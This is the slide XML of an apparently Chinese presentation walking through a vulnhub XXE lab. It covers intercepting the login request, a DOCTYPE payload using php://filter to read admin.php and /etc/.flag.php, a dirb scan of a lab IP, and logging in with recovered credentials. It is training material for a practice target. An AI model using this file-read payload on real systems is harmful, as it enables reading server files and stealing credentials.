                  <a:gd name="adj" fmla="val 19112"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="100000">
                    <a:srgbClr val="E0E0E0"/>
                  </a:gs>
                  <a:gs pos="0">
                    <a:schemeClr val="bg1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="2700000" scaled="1"/>
              </a:gradFill>
              <a:ln w="101600">
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:outerShdw blurRad="177800" dist="88900" dir="2700000" algn="tl" rotWithShape="0">
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                    <a:alpha val="6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4" name="组合 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3081701" y="3076402"/>
              <a:ext cx="1071601" cy="994705"/>
              <a:chOff x="3503864" y="2079606"/>
              <a:chExt cx="1071601" cy="994705"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="文本框 7"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3503864" y="2427980"/>
                <a:ext cx="107160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rPr>
                  <a:t>01</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9" name="文本框 8"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3597472" y="2079606"/>
                <a:ext cx="884387"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rPr>
                  <a:t>PRAT</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4978313" y="2950458"/>
            <a:ext cx="4059809" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>漏洞原理</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2.随便输入账号密码后进行抓包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>可以发现请求正文为XML结构，尝试利用XXE注入。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104" name="图片 103"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect r="28628" b="35741"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1466850" y="2268855"/>
            <a:ext cx="7391400" cy="44069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3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>构造如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>，把用户名从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>summer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>改成了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>zzh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>，成功验证出存在XXE漏洞注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="图片 104"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="16685" r="33140" b="32296"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1336040" y="2367915"/>
            <a:ext cx="7098665" cy="34988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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过XXE注入,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尝试读取出现404的admin.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="5703" b="27912"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="133350" y="2177415"/>
            <a:ext cx="8343265" cy="4202430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8476615" y="2096135"/>
            <a:ext cx="3615690" cy="1833880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5C6370"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DOCTYPE ANY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="61AEEE"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> SYSTEM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="61AEEE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"php://filter/read/convert.base64-encode/resource=admin.php"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="999999"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="999999"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Source Code Pro" panose="020B0509030403020204" pitchFamily="49"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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通过XXE注入,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>尝试读取出现404的admin.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="108" name="图片 107"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="6213" t="7550"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="2331720"/>
            <a:ext cx="11336655" cy="3623310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="109" name="图片 108"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="10299" r="17073" b="14579"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1174115" y="2864485"/>
            <a:ext cx="5742940" cy="3209925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="110" name="图片 109"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:srcRect r="4127" b="16152"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4850765" y="4809490"/>
            <a:ext cx="7095490" cy="1964690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1632585" y="4323080"/>
            <a:ext cx="4410710" cy="35433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5.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用用户名：administhebest，密码：admin@123登录之前的xxe网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111" name="图片 110"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect r="21482" b="18200"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1494155" y="2371725"/>
            <a:ext cx="5481955" cy="34048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6.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用dirb扫描/xxe/目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：dirb http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>192.168.235.144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/xxe/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112" name="图片 111"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect b="47159"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1268095" y="2380615"/>
            <a:ext cx="7086600" cy="3543300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1487805" y="4856480"/>
            <a:ext cx="4410710" cy="354330"/>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7.尝试用刚才的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>账户密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>登录/xxe/admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>，出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>，点击后跳转到了一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>界面</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="113" name="图片 112"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1511935" y="2362835"/>
            <a:ext cx="5772150" cy="3619500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="114" name="图片 113"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect r="46618" b="23741"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6116320" y="3679825"/>
            <a:ext cx="5613400" cy="28473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a:t>三、漏洞利用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>8.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>和之前处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>admin.php404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>的办法一样</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>修改payload中resource后的文件名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="115" name="图片 114"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect t="17875" r="4995" b="11229"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1343025" y="2177415"/>
            <a:ext cx="9022080" cy="4470400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="10723" r="38813" b="19807"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2124075" y="2404745"/>
            <a:ext cx="7459980" cy="3015615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="117" name="图片 116"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123758" y="4905058"/>
            <a:ext cx="5153025" cy="1590675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="118" name="图片 117"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect t="4519" r="74776" b="33185"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7710805" y="4511675"/>
            <a:ext cx="3053715" cy="2136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zh-CN" altLang="en-US" sz="2400" b="1" spc="300" dirty="0">
                  <a:latin typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:ea typeface="幼圆" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>vulnhub虚拟机靶场实战</a:t>
              </a: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6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="853440" y="1101090"/>
            <a:ext cx="11092815" cy="1076325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>三、漏洞利用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>9.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>修改payload中resource后的文件名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="119" name="图片 118"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect t="18833" r="19090" b="15907"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="946785" y="2177415"/>
            <a:ext cx="9123680" cy="4475480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect t="12810" r="14609" b="27858"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="408305" y="2564765"/>
            <a:ext cx="10410825" cy="2188210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="121" name="图片 120"/>
          <p:cNvPicPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657475" y="2342515"/>
            <a:ext cx="9027795" cy="4515485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2830830" y="6216650"/>
            <a:ext cx="2076450" cy="194945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ED7D31">
              <a:alpha val="0"/>
            </a:srgbClr>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642522" y="2626360"/>
            <a:ext cx="2011680" cy="2011680"/>
            <a:chOff x="2611664" y="2548865"/>
            <a:chExt cx="2011680" cy="2011680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2611664" y="2548865"/>
              <a:ext cx="2011680" cy="2011680"/>
              <a:chOff x="1805940" y="1198245"/>
              <a:chExt cx="2011680" cy="2011680"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="圆角矩形 1"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1805940" y="1198245"/>
                <a:ext cx="2011680" cy="2011680"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst>
                  <a:gd name="adj" fmla="val 19981"/>
                </a:avLst>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="596E69"/>
              </a:solidFill>
              <a:ln w="22225">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:gs>
